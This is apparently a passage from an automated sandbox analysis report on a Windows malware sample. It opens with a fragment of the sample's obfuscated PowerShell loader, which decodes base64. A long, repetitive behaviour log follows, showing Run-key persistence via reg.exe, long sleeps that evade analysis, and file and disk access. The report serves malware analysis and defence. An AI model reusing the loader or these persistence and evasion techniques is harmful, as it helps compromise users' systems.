asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM .Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07A7992B push 8B05EA24h; iretd 4_2_07A79936
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04662241 push ss; ret 14_2_04662257
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04662801 push ecx; retf 14_2_04662803
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046612C4 push ebp; retf 14_2_046612EA
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04663ECB push esi; retf 14_2_04663ECC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0466336A push E648F064h; iretd 14_2_0466336F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04662BE5 push A1D9F17Dh; retf 14_2_04662BEC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046649F3 push ebx; retf 14_2_046649B9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04660FCC push esp; iretd 14_2_04660FDF
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04660FD4 push esp; iretd 14_2_04660FDF
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04660BAA push ebp; iretd 14_2_04660BAE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046649A8 push ebx; retf 14_2_046649B9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04660D82 push ebx; iretd 14_2_04660D83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0466178F push eax; ret 14_2_04661790
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04664F8F push edi; retf 14_2_04664F9A
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SorbedJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SorbedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5223Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5895Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3846Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1336Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6624Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2424Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6488Thread sleep count: 2942 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5896Thread sleep count: 317 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5896Thread sleep time: -951000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5896Thread sleep count: 6082 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5896Thread sleep time: -18246000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 2942 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
